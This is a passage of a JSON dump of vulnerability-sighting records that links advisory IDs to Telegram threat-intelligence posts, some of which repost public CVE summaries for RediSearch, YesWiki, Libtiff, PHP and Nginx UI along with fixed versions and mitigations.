"26bc01ae-5e56-4c20-98aa-40f6d5a70e43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWW4-4W9C-7733", "type": "published-proof-of-concept", "source": "Telegram/DJsg5Qi7j92DgCP14lqfeXU4IPClBfbIww0fpCMr4ueipk0", "content": "", "creation_timestamp": "2026-04-03T17:26:40.000000Z"}, {"uuid": "375135d8-55d3-40ff-bacc-a215e069ebd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HP5W-3HXX-VMWF", "type": "published-proof-of-concept", "source": "Telegram/DJsg5Qi7j92DgCP14lqfeXU4IPClBfbIww0fpCMr4ueipk0", "content": "", "creation_timestamp": "2026-04-03T17:26:40.000000Z"}, {"uuid": "9f25bc07-617e-48f3-ace1-fcbfb1d36d85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-245V-P8FJ-VWM2", "type": "published-proof-of-concept", "source": "Telegram/DJsg5Qi7j92DgCP14lqfeXU4IPClBfbIww0fpCMr4ueipk0", "content": "", "creation_timestamp": "2026-04-03T17:26:40.000000Z"}, {"uuid": "2f6de84c-84f7-4824-9cce-95283a4a1a94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-538C-55JV-C5G9", "type": "published-proof-of-concept", "source": "Telegram/DJsg5Qi7j92DgCP14lqfeXU4IPClBfbIww0fpCMr4ueipk0", "content": "", "creation_timestamp": "2026-04-03T17:26:40.000000Z"}, {"uuid": "313efb1b-e8ad-45ec-8fb1-59aff89b2431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8MHJ-RFFC-RCVW", "type": "seen", "source": "Telegram/t4suql6I0-EgAbge55Y7fbPScZyJgFXRiuXCvL-XHGMk0_Q", "content": "", "creation_timestamp": "2026-04-03T17:25:37.000000Z"}, {"uuid": "c1764a10-e43b-4801-a41c-16087ce86372", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6FPF-248C-M7WM", "type": "seen", "source": "Telegram/DMrtbPbyVuvJyzUNlrr2TA99ljgvsTw1ZTHgoXyjyFD12Ec", "content": "", "creation_timestamp": "2026-04-03T15:23:03.000000Z"}, {"uuid": "0efbdf94-a3d1-4f14-99b6-3fae36ccdfc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P2PG-67M3-4C76", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/730", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-51737\n\ud83d\udd39 Description: RediSearch is a Redis module that provides querying, secondary indexing, and full-text search for Redis. An authenticated redis user executing FT.SEARCH or FT.AGGREGATE with a specially crafted LIMIT command argument, or FT.SEARCH with a specially crafted KNN command argument, can trigger an integer overflow, leading to heap overflow and potential remote code execution. This vulnerability is fixed in 2.6.24, 2.8.21, and 2.10.10. Avoid setting value of -1 or large values for configuration parameters MAXSEARCHRESULTS and MAXAGGREGATERESULTS, to avoid exploiting large LIMIT arguments.\n\ud83d\udccf Published: 2025-01-08T15:27:15.780Z\n\ud83d\udccf Modified: 2025-01-08T15:43:17.211Z\n\ud83d\udd17 References:\n1. https://github.com/RediSearch/RediSearch/security/advisories/GHSA-p2pg-67m3-4c76\n2. https://github.com/RediSearch/RediSearch/commit/13a2936d921dbe5a2e3c72653e0bd7b26af3a6cb", "creation_timestamp": "2025-01-08T16:21:50.000000Z"}, {"uuid": "94068187-106e-42d4-9487-cebb711f5361", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2F8P-QQX2-GWR2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13883", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46349\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L)\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. Prior to version 4.5.4, YesWiki is vulnerable to reflected XSS in the file upload form. This vulnerability allows any malicious unauthenticated user to create a link that can be clicked on by the victim to perform arbitrary actions. This issue has been patched in version 4.5.4.\n\ud83d\udccf Published: 2025-04-29T17:11:10.679Z\n\ud83d\udccf Modified: 2025-04-29T18:01:20.769Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-2f8p-qqx2-gwr2\n2. https://github.com/YesWiki/yeswiki/pull/1264/commits/6edde40eb7eeb5d60619ac4d1e0a0422d92e9524", "creation_timestamp": "2025-04-29T18:12:20.000000Z"}, {"uuid": "e29f7c19-eba8-4064-9f3a-fbfdd4a3d95a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5HG-H7RR-GPF3", "type": "seen", "source": "Telegram/u2qRHjnv5kQDuTkkxczYUuDfihUUcY0XYmdq7J3tY866RjI", "content": "", "creation_timestamp": "2026-04-23T23:27:29.000000Z"}, {"uuid": "96d4d6a8-4a26-4b4e-b545-9c0fd97b2bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H6C2-X2M2-MWHF", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3054", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 Nginx UI \u0441\u0435\u0440\u0432\u0435\u0440\u0430 nginx \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e POST-\u0437\u0430\u043f\u0440\u043e\u0441\u0430\n\nBDU:2026-04537\nCVE-2026-33032\n\n\u041a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b:\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u0440\u043e\u0432\u043d\u044f \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 (WAF) \u0434\u043b\u044f \u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u0442\u0440\u0430\u0444\u0438\u043a\u0430;\n- \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c\u0443 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u0445\u0435\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043f\u043e \u00ab\u0431\u0435\u043b\u044b\u043c \u0441\u043f\u0438\u0441\u043a\u0430\u043c\u00bb;\n- \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0435 /mcp_message\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 SIEM-\u0441\u0438\u0441\u0442\u0435\u043c \u0434\u043b\u044f \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043d\u0438\u044f \u0441\u043e\u0431\u044b\u0442\u0438\u0439, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u043e\u0431\u0440\u0430\u0449\u0435\u043d\u0438\u0435\u043c \u043a \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0443 mcp.ServeHTTP(c);\n- \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438\u0437 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0441\u0435\u0442\u0435\u0439 (\u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442).\n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438:\nhttps://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h6c2-x2m2-mwhf", "creation_timestamp": "2026-04-03T12:59:33.000000Z"}, {"uuid": "4eb7d328-c2a7-452e-82ad-51ca62254559", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8833", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14527", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7006\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A null pointer dereference flaw was found in Libtiff via `tif_dirinfo.c`. This issue may allow an attacker to trigger memory allocation failures through certain means, such as restricting the heap space size or injecting faults, causing a segmentation fault. This can cause an application crash, eventually leading to a denial of service.\n\ud83d\udccf Published: 2024-08-08T20:49:45.373Z\n\ud83d\udccf Modified: 2025-05-02T17:06:30.599Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6360\n2. https://access.redhat.com/errata/RHSA-2024:8833\n3. https://access.redhat.com/errata/RHSA-2024:8914\n4. https://access.redhat.com/security/cve/CVE-2024-7006\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2302996", "creation_timestamp": "2025-05-02T17:16:26.000000Z"}, {"uuid": "0e003ad4-9502-4547-846f-8c48b1cfd457", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8914", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14527", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7006\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A null pointer dereference flaw was found in Libtiff via `tif_dirinfo.c`. This issue may allow an attacker to trigger memory allocation failures through certain means, such as restricting the heap space size or injecting faults, causing a segmentation fault. This can cause an application crash, eventually leading to a denial of service.\n\ud83d\udccf Published: 2024-08-08T20:49:45.373Z\n\ud83d\udccf Modified: 2025-05-02T17:06:30.599Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6360\n2. https://access.redhat.com/errata/RHSA-2024:8833\n3. https://access.redhat.com/errata/RHSA-2024:8914\n4. https://access.redhat.com/security/cve/CVE-2024-7006\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2302996", "creation_timestamp": "2025-05-02T17:16:26.000000Z"}, {"uuid": "5496ba3e-bc39-4d0b-b9c6-a6d854b85577", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6360", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14527", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7006\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A null pointer dereference flaw was found in Libtiff via `tif_dirinfo.c`. This issue may allow an attacker to trigger memory allocation failures through certain means, such as restricting the heap space size or injecting faults, causing a segmentation fault. This can cause an application crash, eventually leading to a denial of service.\n\ud83d\udccf Published: 2024-08-08T20:49:45.373Z\n\ud83d\udccf Modified: 2025-05-02T17:06:30.599Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6360\n2. https://access.redhat.com/errata/RHSA-2024:8833\n3. https://access.redhat.com/errata/RHSA-2024:8914\n4. https://access.redhat.com/security/cve/CVE-2024-7006\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2302996", "creation_timestamp": "2025-05-02T17:16:26.000000Z"}, {"uuid": "c0f558c1-10ad-4a66-8187-43b63a44448a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6662-54XR-8423", "type": "seen", "source": "https://t.me/ctinow/245431", "content": "GHSA-6662-54XR-8423: The Trojan Horse in Your Cargo.toml: Deconstructing the 'evm-units' Supply Chain Attack\nhttps://ift.tt/dbA96wF", "creation_timestamp": "2026-02-08T00:54:30.000000Z"}, {"uuid": "bf34f4b6-2ec3-40d7-a5f3-368264b5c917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GGQX-43H2-55JP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13927", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46550\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. Prior to version 4.5.4, the `/?BazaR` endpoint and `idformulaire` parameter are vulnerable to cross-site scripting. An attacker can use a reflected cross-site scripting attack to steal cookies from an authenticated user by having them click on a malicious link. Stolen cookies allow the attacker to take over the user\u2019s session. This vulnerability may also allow attackers to deface the website or embed malicious content. This issue has been patched in version 4.5.4.\n\ud83d\udccf Published: 2025-04-29T20:41:01.879Z\n\ud83d\udccf Modified: 2025-04-29T20:41:01.879Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-ggqx-43h2-55jp\n2. https://github.com/YesWiki/yeswiki/commit/4e9e51d80cd024ed2ac5c12c820817e6d8c2655a", "creation_timestamp": "2025-04-29T21:13:28.000000Z"}, {"uuid": "8ef42e99-a642-4de8-acf4-6f126a41189e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JH2-6V7C-86VJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/72", "content": "\ud83d\udccc **CVE ID**: GHSA-5jh2-6v7c-86vj\n\ud83d\udd17 **Aliases**: CVE-2025-0213\n\ud83d\udd39 **Details**: A vulnerability was found in Campcodes Project Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /forms/update_forms.php?action=change_pic2&amp;id=4. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T18:30:23Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T18:30:23Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-284\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0213\n2. https://github.com/shaturo133/POCs/blob/main/Remote20Code20Execution20via20Arbitrary20File20Upload20in20Project20Management20System.md\n3. https://vuldb.com/?ctiid.290158\n4. https://vuldb.com/?id.290158\n5. https://vuldb.com/?submit.44200\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:34:55.000000Z"}, {"uuid": "7271211f-45c6-49b6-9018-7687589f3288", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G665-FM4P-VHFF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1135", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8932\n\ud83d\udd39 Description: In PHP versions 8.1.* before 8.1.31, 8.2.* before 8.2.26, 8.3.* before 8.3.14, uncontrolled long string inputs to ldap_escape()\u00a0function on 32-bit systems can cause an integer overflow, resulting in an out-of-bounds write.\n\ud83d\udccf Published: 2024-11-22T06:03:29.764Z\n\ud83d\udccf Modified: 2025-01-10T13:06:52.262Z\n\ud83d\udd17 References:\n1. https://github.com/php/php-src/security/advisories/GHSA-g665-fm4p-vhff", "creation_timestamp": "2025-01-10T14:05:54.000000Z"}, {"uuid": "c8313073-88d1-46e0-a93a-30d058cf05eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JRXV-486P-M4JQ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/31", "content": "\ud83d\udccc CVE ID: GHSA-jrxv-486p-m4jq\n\ud83d\udd39 Summary: No summary available.\n\ud83d\udd17 More Info: https://nvd.nist.gov/vuln/detail/CVE-2024-1229", "creation_timestamp": "2025-01-05T01:28:36.000000Z"}, {"uuid": "5ef9c995-19ee-4a57-9231-451ba1c97e8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2RQG-GJGV-84JM", "type": "seen", "source": "Telegram/nb8fCm1TK_w7DFYOlnuooYH-uWzxRBf3GinTZz9uDDCr2nY", "content": "", "creation_timestamp": "2026-03-29T15:20:39.000000Z"}, {"uuid": "984aa37f-7f49-420b-bb70-e0fd1f238262", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HJ7-Q844-M2HX", "type": "published-proof-of-concept", "source": "Telegram/glZc2MUrWDW1orrk5KZxOV-1RuNHXXM8No2M1-1_yJOvNvE", "content": "", "creation_timestamp": "2026-03-31T15:18:14.000000Z"}, {"uuid": "ac1785f7-50bf-44fb-9569-41170682867b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VR79-8M62-WH98", "type": "published-proof-of-concept", "source": "Telegram/pGlKXNBirRT0gxqFC1bVLs6_pojbUfu72MTdyyvCxHD2SpM", "content": "", "creation_timestamp": "2026-03-31T19:20:27.000000Z"}, {"uuid": "2ab47772-802b-4f4d-9fdd-f6e2bd1f627b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FGV2-4Q4G-WC35", "type": "published-proof-of-concept", "source": "Telegram/pGlKXNBirRT0gxqFC1bVLs6_pojbUfu72MTdyyvCxHD2SpM", "content": "", "creation_timestamp": "2026-03-31T19:20:27.000000Z"}, {"uuid": "5b42eba5-820d-49ae-b185-135b8ddc7fed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3RH2-V3GR-35P9", "type": "published-proof-of-concept", "source": "Telegram/KAeZyql0w7ADSWCNfrKYv7UvYEMEw072WjtVkI_nGvWCcTc", "content": "", "creation_timestamp": "2026-03-31T21:19:25.000000Z"}, {"uuid": "cb48c99e-fa86-4bb5-b6e5-985cf54d3858", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WP76-GG32-8258", "type": "published-proof-of-concept", "source": "Telegram/KAeZyql0w7ADSWCNfrKYv7UvYEMEw072WjtVkI_nGvWCcTc", "content": "", "creation_timestamp": "2026-03-31T21:19:25.000000Z"}, {"uuid": "b0ef16dd-5082-42e7-9036-250109aca410", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8JM9-2925-G4V2", "type": "published-proof-of-concept", "source": "Telegram/dTdXmSClQuUutduSI7B7lq8U0lWyZCa4SY-4SfXv6kqarNA", "content": "", "creation_timestamp": "2026-03-30T23:20:23.000000Z"}, {"uuid": "b2118ace-29bf-47b1-80d9-a6edc08960ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8469-2XCX-FRF6", "type": "published-proof-of-concept", "source": "Telegram/dTdXmSClQuUutduSI7B7lq8U0lWyZCa4SY-4SfXv6kqarNA", "content": "", "creation_timestamp": "2026-03-30T23:20:23.000000Z"}, {"uuid": "439181cf-93a2-425c-8aef-b7810576f19b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V77R-XG3P-75G7", "type": "published-proof-of-concept", "source": "Telegram/dTdXmSClQuUutduSI7B7lq8U0lWyZCa4SY-4SfXv6kqarNA", "content": "", "creation_timestamp": "2026-03-30T23:20:23.000000Z"}, {"uuid": "189c616e-f257-42d3-825a-df6f017758b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H6QW-WXVM-HF97", "type": "published-proof-of-concept", "source": "Telegram/dTdXmSClQuUutduSI7B7lq8U0lWyZCa4SY-4SfXv6kqarNA", "content": "", "creation_timestamp": "2026-03-30T23:20:23.000000Z"}, {"uuid": "56df7cff-9774-493e-be76-5896e0850fa1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FF8H-P5VC-WCWC", "type": "seen", "source": "Telegram/aYCyNSm85uFE8xgl3G3j-Sn1NnPkfaU1HaAlO581ff2GeJQ", "content": "", "creation_timestamp": "2026-03-30T23:20:36.000000Z"}, {"uuid": "5195032a-e5fc-4583-b290-45292e4c8a16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W36R-F268-PWRJ", "type": "seen", "source": "Telegram/ky16Z8CpY9UfGCFQKDuXqskkeRz_ODLCHisg6zhKBGmfTV8", "content": "", "creation_timestamp": "2026-03-31T17:24:58.000000Z"}, {"uuid": "83e2fd38-5579-4a41-85cf-bebe294e672a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73G7-86QR-JRG3", "type": "published-proof-of-concept", "source": "Telegram/2Cqk_qvtgaegci7UwxXD-qABu2YaVYQoLZQGlshG1KuvbS0", "content": "", "creation_timestamp": "2026-03-31T23:21:09.000000Z"}, {"uuid": "a6b22df1-cb7f-4c86-a039-ddc7b855fde6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5G3V-QC79-QQWR", "type": "published-proof-of-concept", "source": "Telegram/glZc2MUrWDW1orrk5KZxOV-1RuNHXXM8No2M1-1_yJOvNvE", "content": "", "creation_timestamp": "2026-03-31T15:18:14.000000Z"}, {"uuid": "cdfcfd62-34e3-46d9-9130-57ffad375322", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3458-R943-HMX4", "type": "published-proof-of-concept", "source": "Telegram/WxHgPFElWYDoFBGl3K0BVKfspuGbiR8geCdPJnxqtoWdxxM", "content": "", "creation_timestamp": "2026-03-31T17:24:25.000000Z"}, {"uuid": "2c6e01fe-a155-47a1-9958-19b4c6c6e96f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7WMG-CRC8-6XXF", "type": "published-proof-of-concept", "source": "Telegram/WxHgPFElWYDoFBGl3K0BVKfspuGbiR8geCdPJnxqtoWdxxM", "content": "", "creation_timestamp": "2026-03-31T17:24:25.000000Z"}, {"uuid": "d5815768-22c4-425c-b2ba-227f95286dc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W5PC-M664-R62V", "type": "published-proof-of-concept", "source": "Telegram/WxHgPFElWYDoFBGl3K0BVKfspuGbiR8geCdPJnxqtoWdxxM", "content": "", "creation_timestamp": "2026-03-31T17:24:25.000000Z"}, {"uuid": "97a734ef-5ae8-4cc6-b891-0123cdbd89c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4WWR-7H7C-CHQR", "type": "published-proof-of-concept", "source": "Telegram/nmybyhyW9j--U7tziXdh4Y31RLU4faF2Hhhi6Dlcxk1tj2s", "content": "", "creation_timestamp": "2026-03-31T23:20:06.000000Z"}, {"uuid": "94d1f83e-e1b8-4730-86da-e8d156f50210", "vulnerability_lookup_origin": 